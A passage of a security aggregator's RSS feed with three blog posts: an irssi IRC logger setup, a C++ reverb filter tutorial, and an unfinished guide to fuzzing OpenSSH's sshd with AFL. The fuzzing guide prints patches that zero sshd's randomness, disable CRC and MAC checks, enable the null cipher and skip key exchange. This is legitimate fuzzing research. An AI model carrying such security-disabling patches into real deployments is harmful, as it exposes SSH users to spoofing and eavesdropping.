<content:encoded><![CDATA[Here's the recipe for the Jato IRC logger. Nothing fancy, but works surprisingly well.<br><br><span>/home/vegard/jato-irc-logger/irssi-config</span>:<br><pre>settings = {<br>       core = {<br>               real_name = "#jato IRC logger";<br>               user_name = "vegard";<br>               nick = "jato-irc-logger";<br>       };<br><br>       "fe-text" = {<br>               actlist_sort = "refnum";<br>       };<br><br>       "fe-common/core" = {<br>               autolog = "Yes";<br>               autolog_path = "logs/$0/%Y-%m-%d.txt";<br>       };<br>};<br><br>servers = (<br>       {<br>               address = "irc.freenode.net";<br>               chatnet = "Freenode";<br>               port = "6667";<br>               autoconnect = "Yes";<br>       },<br>);<br><br>chatnets = {<br>       Freenode = {<br>               type = "IRC";<br>               autosendcmd = "/^msg nickserv identify vegard <span>password</span>";<br>       };<br>};<br><br>channels = (<br>       {<br>               name = "#jato";<br>               chatnet = "Freenode";<br>               autojoin = "Yes";<br>       },<br>);</pre><br><br><span>/home/vegard/jato-irc-logger/</span><span>screenrc</span>:<br><pre>screen irssi --config=irssi-config</pre><br><br><span>/home/vegard/jato-irc-logger/</span><span>start-logger.sh</span>:<br><pre>#! /bin/bash -e<br><br>screen -c screenrc -dmS jato-irc-logger<br></pre><br><br><span>crontab</span>:<br><pre># m h  dom mon dow   command<br>0 * * * * rsync -r -t --chmod=a+r jato-irc-logger/logs/#jato/ vegardno@<span>hostname</span>:www_docs/jato-irc-logs</pre><br><br><span>/etc/rc.local</span>:<br><pre>#!/bin/sh -e<br><br>cd /home/vegard/jato-irc-logger<br>sudo -u vegard ./start-logger.sh &amp;<br><br>exit 0</pre>]]></content:encoded>
</item>
<item>
<title><![CDATA[Writing a reverb filter from first principles]]></title>
<description><![CDATA[WARNING/DISCLAIMER: Audio programming always carries the risk of damaging your speakers and/or your ears if you make a mistake. Therefore, remember to always turn down the volume completely before and after testing your program. And whatever you do, don't use headphones or earphones. I take no re...]]></description>
<link>https://tsecurity.de/de/3500803/unix-server/writing-a-reverb-filter-from-first-principles/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3500803/unix-server/writing-a-reverb-filter-from-first-principles/</guid>
<pubDate>Fri, 08 May 2026 22:55:34 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<b>WARNING/DISCLAIMER: Audio programming always carries the risk of damaging your speakers and/or your ears if you make a mistake. Therefore, remember to always turn down the volume completely before and after testing your program. And whatever you do, don't use headphones or earphones. I take no responsibility for damage that may occur as a result of this blog post!</b><br>
<br>
Have you ever wondered how a reverb filter works? I have... and here's what I came up with.<br>
<br>
Reverb is the sound effect you commonly get when you make sound inside a room or building, as opposed to when you are outdoors. The stairwell in my old apartment building had an excellent reverb. Most live musicians hate reverb because it muddles the sound they're trying to create and can even throw them off while playing. On the other hand, reverb is very often used (and overused) in the studio vocals because it also has the effect of smoothing out rough edges and imperfections in a recording.<br>
<br>
We typically distinguish reverb from echo in that an echo is a single delayed "replay" of the original sound you made. The delay is also typically rather large (think yelling into a distant hill- or mountainside and hearing your HEY! come back a second or more later). In more detail, the two things that distinguish reverb from an echo are:<br>
<br>
<ol><li>The reverb inside a room or a hall has a much shorter delay than an echo. The speed of sound is roughly 340 meters/second, so if you're in the middle of a room that is 20 meters by 20 meters, the sound will come back to you (from one wall) after (20 / 2) / 340 = ~0.029 seconds, which is such a short duration of time that we can hardly notice it (by comparison, a 30 FPS video would display each frame for ~0.033 seconds).</li>
<li>After bouncing off one wall, the sound reflects back and reflects off the other wall. It also reflects off the perpendicular walls and any and all objects that are in the room. Even more, the sound has to travel slightly longer to reach the corners of the room (~14 meters instead of 10). All these echoes themselves go on to combine and echo off all the <i>other</i> surfaces in the room until all the energy of the original sound has dissipated.</li>
</ol><br>
Intuitively, it should be possible to use multiple echoes at different delays to simulate reverb.<br>
<br>
We can implement a single echo using a very simple ring buffer:<br>
<br>
<span>    class FeedbackBuffer {</span><br>
<span>    public:</span><br>
<span>        unsigned int nr_samples;</span><br>
<span>        int16_t *samples;</span><br>
<span><br>
</span> <span>        unsigned int pos;</span><br>
<span><br>
</span> <span>        FeedbackBuffer(unsigned int nr_samples):</span><br>
<span>            nr_samples(nr_samples),</span><br>
<span>            samples(new int16_t[nr_samples]),</span><br>
<span>            pos(0)</span><br>
<span>        {</span><br>
<span>        }</span><br>
<span><br>
</span> <span>        ~FeedbackBuffer()</span><br>
<span>        {</span><br>
<span>            delete[] samples;</span><br>
<span>        }</span><br>
<span><br>
</span> <span>        int16_t get() const</span><br>
<span>        {</span><br>
<span>            return samples[pos];</span><br>
<span>        }</span><br>
<span><br>
</span> <span>        void add(int16_t sample)</span><br>
<span>        {</span><br>
<span>            samples[pos] = sample;</span><br>
<span><br>
</span> <span>            /* If we reach the end of the buffer, wrap around */</span><br>
<span>            if (++pos == nr_samples)</span><br>
<span>                pos = 0;</span><br>
<span>        }</span><br>
<span>    };</span><br>
<br>
The constructor takes one argument: the number of samples in the buffer, which is exactly how much time we will delay the signal by; when we write a sample to the buffer using the <span>add()</span> function, it will come back after a delay of exactly <span>nr_samples</span> using the <span>get()</span> function. Easy, right?<br>
<br>
Since this is an audio filter, we need to be able to read an input signal and write an output signal. For simplicity, I'm going to use stdin and stdout for this -- we will read 8 KiB at a time using <span>read()</span>, process that, and then use <span>write()</span> to output the result. It will look something like this:<br>
<br>
<span>    #include &lt;cstdio&gt;<br>
    #include &lt;cstdint&gt;<br>
    #include &lt;cstdlib&gt;<br>
    #include &lt;cstring&gt;<br>
    #include &lt;unistd.h&gt;</span><br>
<span><br>
</span> <span>    int main(int argc, char *argv[])</span><br>
<span>    {</span><br>
<span>        while (true) {</span><br>
<span>            int16_t buf[8192];</span><br>
<span>            ssize_t in = read(STDIN_FILENO, buf, sizeof(buf));</span><br>
<span>            if (in == -1) {</span><br>
<span>                /* Error */</span><br>
<span>                return 1;</span><br>
<span>            }</span><br>
<span>            if (in == 0) {</span><br>
<span>                /* EOF */</span><br>
<span>                break;</span><br>
<span>            }</span><br>
<span><br>
</span> <span>            for (unsigned int j = 0; j &lt; in / sizeof(*buf); ++j) {</span><br>
<span>                /* TODO: Apply filter to each sample here */</span><br>
<span>            }</span><br>
<span><br>
</span> <span>            write(STDOUT_FILENO, buf, in);</span><br>
<span>        }</span><br>
<span><br>
</span> <span>        return 0;</span><br>
<span>    }</span><br>
<br>
On Linux you can use e.g. 'arecord' to get samples from the microphone and 'aplay' to play samples on the speakers, and you can do the whole thing on the command line:<br>
<br>
<span>    $ arecord -t raw -c 1 -f s16 -r 44100 |\</span><br>
<span>        ./reverb | aplay -t raw -c 1 -f s16 -r 44100</span><br>
<br>
(-c means 1 channel; -f s16 means "signed 16-bit" which corresponds to the <span>int16_t</span> type we've used for our buffers; -r 44100 means a sample rate of 44100 samples per second; and <span>./reverb</span> is the name of our executable.)<br>
<br>
So how do we use class FeedbackBuffer to generate the reverb effect?<br>
<br>
Remember how I said that reverb is essentially <b>many</b> echoes? Let's add a few of them at the top of <span>main()</span>:<br>
<br>
<span>    FeedbackBuffer fb0(1229);</span><br>
<span>    FeedbackBuffer fb1(1559);</span><br>
<span>    FeedbackBuffer fb2(1907);</span><br>
<span>    FeedbackBuffer fb3(4057);</span><br>
<span>    FeedbackBuffer fb4(8117);</span><br>
<span>    FeedbackBuffer fb5(8311);</span><br>
<span>    FeedbackBuffer fb6(9931);</span><br>
<br>
The buffer sizes that I've chosen here are somewhat arbitrary (I played with a bunch of different combinations and this sounded okay to me). But I used this as a rough guideline: simulating the 20m-by-20m room at a sample rate of 44100 samples per second means we would need delays roughly on the order of 44100 / (20 / 340) = 2594 samples.<br>
<br>
Another thing to keep in mind is that we generally do not want our feedback buffers to be multiples of each other. The reason for this is that it creates a consonance between them and will cause certain frequencies to be amplified much more than others. As an example, if you count from 1 to 500 (and continue again from 1), and you have a friend who counts from 1 to 1000 (and continues again from 1), then you would start out 1-1, 2-2, 3-3, etc. up to 500-500, then you would go 1-501, 2-502, 3-504, etc. up to 500-1000. But then, as you both wrap around, you start at 1-1 again. And your friend will always be on 1 when you are on 1. This has everything to do with periodicity and -- in fact -- prime numbers! If you want to maximise the combined period of two counters, you have to make sure that they are relatively coprime, i.e. that they don't share any common factors. The easiest way to achieve this is to only pick prime numbers to start with, so that's what I did for my feedback buffers above.<br>
<br>
Having created the feedback buffers (which each represent one echo of the original sound), it's time to put them to use. The effect I want to create is not simply overlaying echoes at fixed intervals, but to have the echos bounce off each other and feed back into each other. The way we do this is by first combining them into the output signal... (since we have 8 signals to combine including the original one, I give each one a 1/8 weight)<br>
<br>
<span>    float x = .125 * buf[j];</span><br>
<span>    x += .125 * fb0.get();</span><br>
<span>    x += .125 * fb1.get();</span><br>
<span>    x += .125 * fb2.get();</span><br>
<span>    x += .125 * fb3.get();</span><br>
<span>    x += .125 * fb4.get();</span><br>
<span>    x += .125 * fb5.get();</span><br>
<span>    x += .125 * fb6.get();</span><br>
<span>    int16_t out = x;</span><br>
<br>
...then feeding the result back into each of them:<br>
<br>
<span>    fb0.add(out);</span><br>
<span>    fb1.add(out);</span><br>
<span>    fb2.add(out);</span><br>
<span>    fb3.add(out);</span><br>
<span>    fb4.add(out);</span><br>
<span>    fb5.add(out);</span><br>
<span>    fb6.add(out);</span><br>
<br>
And finally we also write the result back into the buffer. I found that the original signal loses some of its power, so I use a factor 4 gain to bring it roughly back to its original strength; this number is an arbitrary choice by me, I don't have any specific calculations to support it:<br>
<br>
<span>    buf[j] = 4 * out;</span><br>
<br>
That's it! 88 lines of code is enough to write a very basic reverb filter from first principles. Be careful when you run it, though, even the smallest mistake could cause very loud and unpleasant sounds to be played.<br>
<br>
If you play with different buffer sizes or a different number of feedback buffers, let me know if you discover anything interesting :-)]]></content:encoded>
</item>
<item>
<title><![CDATA[Fuzzing the OpenSSH daemon using AFL]]></title>
<description><![CDATA[(EDIT 2017-03-25: All my patches to make OpenSSH more amenable to fuzzing with AFL are available at https://github.com/vegard/openssh-portable. This also includes improvements to the patches found in this post.)American Fuzzy Lop is a great tool. It does take a little bit of extra setup and tweak...]]></description>
<link>https://tsecurity.de/de/3500760/unix-server/fuzzing-the-openssh-daemon-using-afl/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3500760/unix-server/fuzzing-the-openssh-daemon-using-afl/</guid>
<pubDate>Fri, 08 May 2026 22:54:16 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>(<strong>EDIT 2017-03-25</strong>: All my patches to make OpenSSH more amenable to fuzzing with AFL are available at <a href="https://github.com/vegard/openssh-portable" class="uri">https://github.com/vegard/openssh-portable</a>. This also includes improvements to the patches found in this post.)</p><p><a href="http://lcamtuf.coredump.cx/afl/">American Fuzzy Lop</a> is a great tool. It does take a little bit of extra setup and tweaking if you want to go into advanced usage, but mostly it just works out of the box.</p><p>In this post, I’ll detail some of the steps you need to get started with fuzzing the OpenSSH daemon (sshd) and show you some tricks that will help get results more quickly.</p><p>The AFL home page already displays 4 OpenSSH bugs in its trophy case; these were found by <a href="https://cxsecurity.com/issue/WLB-2015050105">Hanno Böck</a> who used an approach similar to that <a href="https://www.fastly.com/blog/how-fuzz-server-american-fuzzy-lop">outlined by Jonathan Foote</a> on how to fuzz servers with AFL.</p><p>I take a slightly different approach, which I think is simpler: instead of intercepting system calls to fake network activity, we just run the daemon in “inetd mode”. The inet daemon is not used very much anymore on modern Linux distributions, but the short story is that it sets up the listening network socket for you and launches a new process to handle each new incoming connection. inetd then passes the network socket to the target program as stdin/stdout. Thus, when sshd is started in inet mode, it communicates with a single client over stdin/stdout, which is exactly what we need for AFL.</p><h2>Configuring and building AFL</h2><p>If you are just starting out with AFL, you can probably just type <code>make</code> in the top-level AFL directory to compile everything, and it will just work. However, I want to use some more advanced features, in particular I would like to compile sshd using LLVM-based instrumentation (which is slightly faster than the “assembly transformation by sed” that AFL uses by default). Using LLVM also allows us to move the target program’s “fork point” from just before entering main() to an arbitrary location (known as “deferred forkserver mode” in AFL-speak); this means that we can skip some of the setup operations in OpenSSH, most notably reading/parsing configs and loading private keys.</p><p>Most of the steps for using LLVM mode are detailed in AFL’s <code>llvm_mode/README.llvm</code>. On Ubuntu, you should install the <code>clang</code> and <code>llvm</code> packages, then run <code>make -C llvm_mode</code> from the top-level AFL directory, and that’s pretty much it. You should get a binary called <code>afl-clang-fast</code>, which is what we’re going to use to compile sshd.</p><h2>Configuring and building OpenSSH</h2><p>I’m on Linux so I use the “portable” flavour of OpenSSH, which conveniently also uses git (as opposed to the OpenBSD version which still uses CVS – WTF!?). Go ahead and clone it from <code>git://anongit.mindrot.org/openssh.git</code>.</p><p>Run <code>autoreconf</code> to generate the <code>configure</code> script. This is how I run the config script:</p><pre><code>./configure \
    CC="$PWD/afl-2.39b/afl-clang-fast" \
    CFLAGS="-g -O3" \
    --prefix=$PWD/install \
    --with-privsep-path=$PWD/var-empty \
    --with-sandbox=no \
    --with-privsep-user=vegard</code></pre><p>You obviously need to pass the right path to <code>afl-clang-fast</code>. I’ve also created two directories in the current (top-level OpenSSH directory), <code>install</code> and <code>var-empty</code>. This is so that we can run <code>make install</code> without being root (although <code>var-empty</code> needs to have mode 700 and be owned by root) and without risking clobbering any system files (which would be extremely bad, as we’re later going to disable authentication and encryption!). We really do need to run <code>make install</code>, even though we’re not going to be running sshd from the installation directory. This is because sshd needs some private keys to run, and that is where it will look for them.</p><p>(<strong>EDIT 2017-03-25</strong>: Passing <code>--without-pie</code> to <code>configure</code> may help make the resulting binaries easier to debug since instruction pointers will not be randomised.)</p><p>If everything goes well, running <code>make</code> should display the AFL banner as OpenSSH is compiled.</p><p>You may need some extra libraries (<code>zlib1g-dev</code> and <code>libssl-dev</code> on Ubuntu) for the build to succeeed.</p><p>Run <code>make install</code> to install sshd into the <code>install/</code> subdirectory (and again, please don’t run this as root).</p><p>We will have to rebuild OpenSSH a few times as we apply some patches to it, but this gives you the basic ingredients for a build. One particular annoying thing I’ve noticed is that OpenSSH doesn’t always detect source changes when you run <code>make</code> (and so your changes may not actually make it into the binary). For this reason I just adopted the habit of always running <code>make clean</code> before recompiling anything. Just a heads up!</p><h2>Running sshd</h2><p>Before we can actually run sshd under AFL, we need to figure out exactly how to invoke it with all the right flags and options. This is what I use:</p><pre><code>./sshd -d -e -p 2200 -r -f sshd_config -i</code></pre><p>This is what it means:</p><dl><dt><code>-d</code></dt>
<dd>“Debug mode”. Keeps the daemon from forking, makes it accept only a single connection, and keeps it from putting itself in the background. All useful things that we need. </dd>
<dt><code>-e</code></dt>
<dd>This makes it log to stderr instead of syslog; this first of all prevents clobbering your system log with debug messages from our fuzzing instance, and also gives a small speed boost. </dd>
<dt><code>-p 2200</code></dt>
<dd>The TCP port to listen to. This is not really used in inetd mode (<code>-i</code>), but is useful later on when we want to generate our first input testcase. </dd>
<dt><code>-r</code></dt>
<dd>This option is not documented (or not in my man page, at least), but you can find it in the source code, which should hopefully also explain what it does: preventing sshd from re-execing itself. I think this is a security feature, since it allows the process to isolate itself from the original environment. In our case, it complicates and slows things down unnecessarily, so we disable it by passing <code>-r</code>. </dd>
<dt><code>-f sshd_config</code></dt>
<dd>Use the sshd_config from the current directory. This just allows us to customise the config later without having to reinstall it or be unsure about which location it’s really loaded from. </dd>
<dt><code>-i</code></dt>
<dd>“Inetd mode”. As already mentioned, inetd mode will make the server process a single connection on stdin/stdout, which is a perfect fit for AFL (as it will write testcases on the program’s stdin by default). </dd> </dl><p>Go ahead and run it. It should hopefully print something like this:</p><pre><code>$ ./sshd -d -e -p 2200 -r -f sshd_config -i
debug1: sshd version OpenSSH_7.4, OpenSSL 1.0.2g  1 Mar 2016
debug1: private host key #0: ssh-rsa SHA256:f9xyp3dC+9jCajEBOdhjVRAhxp4RU0amQoj0QJAI9J0
debug1: private host key #1: ssh-dss SHA256:sGRlJclqfI2z63JzwjNlHtCmT4D1WkfPmW3Zdof7SGw
debug1: private host key #2: ecdsa-sha2-nistp256 SHA256:02NDjij34MUhDnifUDVESUdJ14jbzkusoerBq1ghS0s
debug1: private host key #3: ssh-ed25519 SHA256:RsHu96ANXZ+Rk3KL8VUu1DBzxwfZAPF9AxhVANkekNE
debug1: setgroups() failed: Operation not permitted
debug1: inetd sockets after dupping: 3, 4
Connection from UNKNOWN port 65535 on UNKNOWN port 65535
SSH-2.0-OpenSSH_7.4</code></pre><p>If you type some garbage and press enter, it will probably give you “Protocol mismatch.” and exit. This is good!</p><h2>Detecting crashes/disabling privilege separation mode</h2><p>One of the first obstacles I ran into was the fact that I saw sshd crashing in my system logs, but AFL wasn’t detecting them as crashes:</p><pre><code>[726976.333225] sshd[29691]: segfault at 0 ip 000055d3f3139890 sp 00007fff21faa268 error 4 in sshd[55d3f30ca000+bf000]
[726984.822798] sshd[29702]: segfault at 4 ip 00007f503b4f3435 sp 00007fff84c05248 error 4 in libc-2.23.so[7f503b3a6000+1bf000]</code></pre><p>The problem is that OpenSSH comes with a “privilege separation mode” that forks a child process and runs most of the code inside the child. If the child segfaults, the parent still exits normally, so it masks the segfault from AFL (which only observes the parent process directly).</p><p>In version 7.4 and earlier, privilege separation mode can easily be disabled by adding “UsePrivilegeSeparation no” to <code>sshd_config</code> or passing <code>-o UsePrivilegeSeaparation=no</code> on the command line.</p><p>Unfortunately it looks like <a href="http://marc.info/?l=openssh-unix-dev&amp;m=148948810223933&amp;w=2">the OpenSSH developers are removing the ability to disable privilege separation mode in version 7.5 and onwards</a>. This is not a big deal, as OpenSSH maintainer <a href="https://twitter.com/damienmiller/status/842148901788438528">Damien Miller writes on Twitter</a>: “the infrastructure will be there for a while and it’s a 1-line change to turn privsep off”. So you may have to dive into <code>sshd.c</code> to disable it in the future.</p><p>(<strong>EDIT 2017-03-25</strong>: I’ve pushed the source tweak for disabling privilege separation for 7.5 and newer to my OpenSSH GitHub repo. This also obsoletes the need for a config change.)</p><h2>Reducing randomness</h2><p>OpenSSH uses random nonces during the handshake to prevent “replay attacks” where you would record somebody’s (encrypted) SSH session and then you feed the same data to the server again to authenticate again. When random numbers are used, the server and the client will calculate a new set of keys and thus thwart the replay attack.</p><p>In our case, we explicitly <em>want</em> to be able to replay traffic and obtain the same result two times in a row; otherwise, the fuzzer would not be able to gain any useful data from a single connection attempt (as the testcase it found would not be usable for further fuzzing).</p><p>There’s also the possibility that randomness introduces variabilities in other code paths not related to the handshake, but I don’t really know. In any case, we can easily disable the random number generator. On my system, with the <code>configure</code> line above, all or most random numbers seem to come from <code>arc4random_buf()</code> in <code>openbsd-compat/arc4random.c</code>, so to make random numbers very predictable, we can apply this patch:</p><pre><code>diff --git openbsd-compat/arc4random.c openbsd-compat/arc4random.c
--- openbsd-compat/arc4random.c
+++ openbsd-compat/arc4random.c
@@ -242,7 +242,7 @@ void
 arc4random_buf(void *buf, size_t n)
 {
        _ARC4_LOCK();
-       _rs_random_buf(buf, n);
+       memset(buf, 0, n);
        _ARC4_UNLOCK();
 }
 # endif /* !HAVE_ARC4RANDOM_BUF */</code></pre><p>One way to test whether this patch is effective is to try to packet-capture an SSH session and see if it can be replayed successfully. We’re going to have to do that later anyway in order to create our first input testcase, so skip below if you want to see how that’s done. In any case, AFL would also tell us using its “stability” indicator if something was really off with regards to random numbers (&gt;95% stability is generally good, &lt;90% would indicate that something is off and needs to be fixed).</p><h2>Increasing coverage</h2><h3>Disabling message CRCs</h3><p>When fuzzing, we really want to disable as many checksums as we can, as <a href="https://twitter.com/damienmiller/status/842149046017916928">Damien Miller also wrote on twitter</a>: “fuzzing usually wants other code changes too, like ignoring MAC/signature failures to make more stuff reachable”. This may sound a little strange at first, but makes perfect sense: In a real attack scenario, we can always<a href="http://www.vegardno.net/2017/03/fuzzing-openssh-daemon-using-afl.html#fn1" class="footnoteRef"><sup>1</sup></a> fix up CRCs and other checksums to match what the program expects.</p><p>If we don’t disable checksums (and we don’t try to fix them up), then the fuzzer will make very little progress. A single bit flip in a checksum-protected area will just fail the checksum test and never allow the fuzzer to proceed.</p><p>We could of course also fix the checksum up before passing the data to the SSH server, but this is slow and complicated. It’s better to disable the checksum test in the server and then try to fix it up if we do happen to find a testcase which can crash the modified server.</p><p>The first thing we can disable is the packet CRC test:</p><pre><code>diff --git a/packet.c b/packet.c
--- a/packet.c
+++ b/packet.c
@@ -1635,7 +1635,7 @@ ssh_packet_read_poll1(struct ssh *ssh, u_char *typep)
 
        cp = sshbuf_ptr(state-&gt;incoming_packet) + len - 4;
        stored_checksum = PEEK_U32(cp);
-       if (checksum != stored_checksum) {
+       if (0 &amp;&amp; checksum != stored_checksum) {
                error("Corrupted check bytes on input");
                if ((r = sshpkt_disconnect(ssh, "connection corrupted")) != 0 ||
                    (r = ssh_packet_write_wait(ssh)) != 0)</code></pre><p>As far as I understand, this is a simple (non-cryptographic) integrity check meant just as a sanity check against bit flips or incorrectly encoded data.</p><h3>Disabling MACs</h3><p>We can also disable Message Authentication Codes (MACs), which are the cryptographic equivalent of checksums, but which also guarantees that the message came from the expected sender:</p><pre><code>diff --git mac.c mac.c
index 5ba7fae1..ced66fe6 100644
--- mac.c
+++ mac.c
@@ -229,8 +229,10 @@ mac_check(struct sshmac *mac, u_int32_t seqno,
        if ((r = mac_compute(mac, seqno, data, dlen,
            ourmac, sizeof(ourmac))) != 0)
                return r;
+#if 0
        if (timingsafe_bcmp(ourmac, theirmac, mac-&gt;mac_len) != 0)
                return SSH_ERR_MAC_INVALID;
+#endif
        return 0;
 }
 </code></pre><p>We do have to be very careful when making these changes. We want to try to preserve the original behaviour of the program as much as we can, in the sense that we have to be very careful not to introduce bugs of our own. For example, we have to be very sure that we don’t accidentally skip the test which checks that the packet is large enough to contain a checksum in the first place. If we had accidentally skipped that, it is possible that the program being fuzzed would try to access memory beyond the end of the buffer, which would be a bug which is not present in the original program.</p><p>This is also a good reason to never submit crashing testcases to the developers of a program unless you can show that they also crash a completely unmodified program.</p><h3>Disabling encryption</h3><p>The last thing we can do, unless you wish to only fuzz the unencrypted initial protocol handshake and key exchange, is to disable encryption altogether.</p><p>The reason for doing this is exactly the same as the reason for disabling checksums and MACs, namely that the fuzzer would have no hope of being able to fuzz the protocol itself if it had to work with the encrypted data (since touching the encrypted data with overwhelming probability will just cause it to decrypt to random and utter garbage).</p><p>Making the change is surprisingly simple, as OpenSSH already comes with a psuedo-cipher that just passes data through without actually encrypting/decrypting it. All we have to do is to make it available as a cipher that can be negotiated between the client and the server. We can use this patch:</p><pre><code>diff --git a/cipher.c b/cipher.c
index 2def333..64cdadf 100644
--- a/cipher.c
+++ b/cipher.c
@@ -95,7 +95,7 @@ static const struct sshcipher ciphers[] = {
 # endif /* OPENSSL_NO_BF */
 #endif /* WITH_SSH1 */
 #ifdef WITH_OPENSSL
-       { "none",       SSH_CIPHER_NONE, 8, 0, 0, 0, 0, 0, EVP_enc_null },
+       { "none",       SSH_CIPHER_SSH2, 8, 0, 0, 0, 0, 0, EVP_enc_null },
        { "3des-cbc",   SSH_CIPHER_SSH2, 8, 24, 0, 0, 0, 1, EVP_des_ede3_cbc },
 # ifndef OPENSSL_NO_BF
        { "blowfish-cbc",</code></pre><p>To use this cipher by default, just put “Ciphers none” in your sshd_config. Of course, the client doesn’t support it out of the box either, so if you make any test connections, you have to have to use the <code>ssh</code> binary compiled with the patched <code>cipher.c</code> above as well.</p><p>You <em>may</em> have to pass pass <code>-o Ciphers=none</code> from the client as well if it prefers to use a different cipher by default. Use strace or wireshark to verify that communication beyond the initial protocol setup happens in plaintext.</p><h2>Making it fast</h2><h3><code>afl-clang-fast</code>/LLVM “deferred forkserver mode”</h3><p>I mentioned above that using <code>afl-clang-fast</code> (i.e. AFL’s LLVM deferred forkserver mode) allows us to move the “fork point” to skip some of the sshd initialisation steps which are the same for every single testcase we can throw at it.</p><p>To make a long story short, we need to put a call to <code>__AFL_INIT()</code> at the right spot in the program, separating the stuff that doesn’t depend on a specific input to happen <em>before</em> it and the testcase-specific handling to happen <em>after</em> it. I’ve used this patch:</p><pre><code>diff --git a/sshd.c b/sshd.c
--- a/sshd.c
+++ b/sshd.c
@@ -1840,6 +1840,8 @@ main(int ac, char **av)
        /* ignore SIGPIPE */
        signal(SIGPIPE, SIG_IGN);
 
+       __AFL_INIT();
+
        /* Get a connection, either from inetd or a listening TCP socket */
        if (inetd_flag) {
                server_accept_inetd(&amp;sock_in, &amp;sock_out);</code></pre><p>AFL should be able to automatically detect that you no longer wish to start the program from the top of <code>main()</code> every time. However, with only the patch above, I got this scary-looking error message:</p><pre><code>Hmm, looks like the target binary terminated before we could complete a
handshake with the injected code. Perhaps there is a horrible bug in the
fuzzer. Poke &lt;lcamtuf@coredump.cx&gt; for troubleshooting tips.</code></pre><p>So there is obviously some AFL magic code here to make the fuzzer and the fuzzed program communicate. After poking around in <code>afl-fuzz.c</code>, I found <code>FORKSRV_FD</code>, which is a file descriptor pointing to a pipe used for this purpose. The value is 198 (and the other end of the pipe is 199).</p><p>To try to figure out what was going wrong, I ran <code>afl-fuzz</code> under strace, and it showed that file descriptors 198 and 199 were getting closed by sshd. With some more digging, I found the call to <code>closefrom()</code>, which is a function that closes all inherited (and presumed unused) file descriptors starting at a given number. Again, the reason for this code to exist in the first place is probably in order to reduce the attack surface in case an attacker is able to gain control the process. Anyway, the solution is to protect these special file descriptors using a patch like this:</p><pre><code>diff --git openbsd-compat/bsd-closefrom.c openbsd-compat/bsd-closefrom.c
--- openbsd-compat/bsd-closefrom.c
+++ openbsd-compat/bsd-closefrom.c
@@ -81,7 +81,7 @@ closefrom(int lowfd)
        while ((dent = readdir(dirp)) != NULL) {
            fd = strtol(dent-&gt;d_name, &amp;endp, 10);
            if (dent-&gt;d_name != endp &amp;&amp; *endp == '\0' &amp;&amp;
-               fd &gt;= 0 &amp;&amp; fd &lt; INT_MAX &amp;&amp; fd &gt;= lowfd &amp;&amp; fd != dirfd(dirp))
+               fd &gt;= 0 &amp;&amp; fd &lt; INT_MAX &amp;&amp; fd &gt;= lowfd &amp;&amp; fd != dirfd(dirp) &amp;&amp; fd != 198 &amp;&amp; fd != 199)
                (void) close((int) fd);
        }
        (void) closedir(dirp);</code></pre><h3>Skipping expensive DH/curve and key derivation operations</h3><p>At this point, I still wasn’t happy with the execution speed: Some testcases were as low as 10 execs/second, which is really slow.</p><p>I tried compiling sshd with <code>-pg</code> (for gprof) to try to figure out where the time was going, but there are many obstacles to getting this to work properly: First of all, sshd exits using <code>_exit(255)</code> through its <code>cleanup_exit()</code> function. This is not a “normal” exit and so the <code>gmon.out</code> file (containing the profile data) is not written out at all. Applying a source patch to fix that, sshd will give you a “Permission denied” error as it tries to open the file for writing. The problem now is that sshd does a <code>chdir("/")</code>, meaning that it’s trying to write the profile data in a directory where it doesn’t have access. The solution is again simple, just add another <code>chdir()</code> to a writable location before calling <code>exit()</code>. Even with this in place, the profile came out completely empty for me. Maybe it’s another one of those privilege separation things. In any case, I decided to just use valgrind and its “cachegrind” tool to obtain the profile. It’s much easier and gives me the data I need without hassles of reconfiguring, patching, and recompiling.</p><p>The profile showed one very specific hot spot, coming from two different locations: elliptic curve point multiplication.</p><p>I don’t really know too much about elliptic curve cryptography, but apparently it’s pretty expensive to calculate. However, we don’t really need to deal with it; we can assume that the key exchange between the server and the client succeeds. Similar to how we increased coverage above by skipping message CRC checks and replacing the encryption with a dummy cipher, we can simply skip the expensive operations and assume they always succeed. This is a trade-off; we are no longer fuzzing all the verification steps, but allows the fuzzer to concentrate more on the protocol parsing itself. I applied this patch:</p><pre><code>diff --git kexc25519.c kexc25519.c
--- kexc25519.c
+++ kexc25519.c
@@ -68,10 +68,13 @@ kexc25519_shared_key(const u_char key[CURVE25519_SIZE],
 
        /* Check for all-zero public key */
        explicit_bzero(shared_key, CURVE25519_SIZE);
+#if 0
        if (timingsafe_bcmp(pub, shared_key, CURVE25519_SIZE) == 0)
                return SSH_ERR_KEY_INVALID_EC_VALUE;
 
        crypto_scalarmult_curve25519(shared_key, key, pub);
+#endif
+
 #ifdef DEBUG_KEXECDH
        dump_digest("shared secret", shared_key, CURVE25519_SIZE);
 #endif
diff --git kexc25519s.c kexc25519s.c
--- kexc25519s.c
+++ kexc25519s.c
@@ -67,7 +67,12 @@ input_kex_c25519_init(int type, u_int32_t seq, void *ctxt)
        int r;
 
        /* generate private key */
+#if 0
        kexc25519_keygen(server_key, server_pubkey);
+#else
+       explicit_bzero(server_key, sizeof(server_key));
+       explicit_bzero(server_pubkey, sizeof(server_pubkey));
+#endif
 #ifdef DEBUG_KEXECDH
        dump_digest("server private key:", server_key, sizeof(server_key));
 #endif</code></pre><p>With this patch in place, execs/second went to ~2,000 per core, which is a much better speed to be fuzzing at.</p><p>(<strong>EDIT 2017-03-25</strong>: As it turns out, this patch is not very good, because it causes a later key validity check to fail (<code>dh_pub_is_valid()</code> in <code>input_kex_dh_init()</code>). We could perhaps make <code>dh_pub_is_valid()</code> always return true, but then there is a question of whether this in turn makes something else fail down the line.)</p><h2>Creating the first input testcases</h2><p>Before we can start fuzzing for real, we have to create the first few input testcases. Actually, a single one is enough to get started, but if you know how to create different ones taking different code paths in the server, that may help jumpstart the fuzzing process. A few possibilities I can think of:</p><ul><li><code>ssh -A</code> for ssh agent forwarding</li>
<li><code>ssh -R</code> to enable arbitrary port forwarding</li>
<li><code>ssh -Y</code> to enable X11 forwarding</li>
<li><code>scp</code> to transfer a file</li>
<li>password vs. pubkey authentication</li>
</ul><p>The way I created the first testcase was to record the traffic from the client to the server using strace. Start the server without <code>-i</code>:</p><pre><code>./sshd -d -e -p 2200 -r -f sshd_config
[...]
